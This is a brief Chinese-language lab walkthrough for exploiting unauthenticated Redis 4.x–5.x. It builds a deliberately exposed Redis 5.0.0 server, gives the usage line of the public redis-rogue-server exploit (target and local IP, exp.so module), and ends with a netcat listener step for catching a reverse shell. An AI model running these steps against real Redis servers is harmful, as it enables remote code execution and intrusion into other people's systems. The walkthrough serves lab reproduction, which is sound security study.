影响范围
Redis 4.x-Redis 5.x 未授权利用
环境搭建
wget http://download.redis.io/releases/redis-5.0.0.tar.gz
tar -xvzf redis-5.0.0.tar.gz
cd redis-5.0.0
make
更改配置文件
配置文件位于redis-5.0.0文件夹内
vim redis.conf
protected-mode yes 改为protected-mode no
bind 127.0.0.1 改为 bind 0.0.0.0
启动服务
cd src
./redis-server ../redis.conf
exp准备
https://github.com/n0b0dyCN/redis-rogue-server
用法:python3 redis-rogue-server.py --rhost=目标IP --lhost=本机IP --exp=exp.so
漏洞利用
nc监听端口,用来接收shell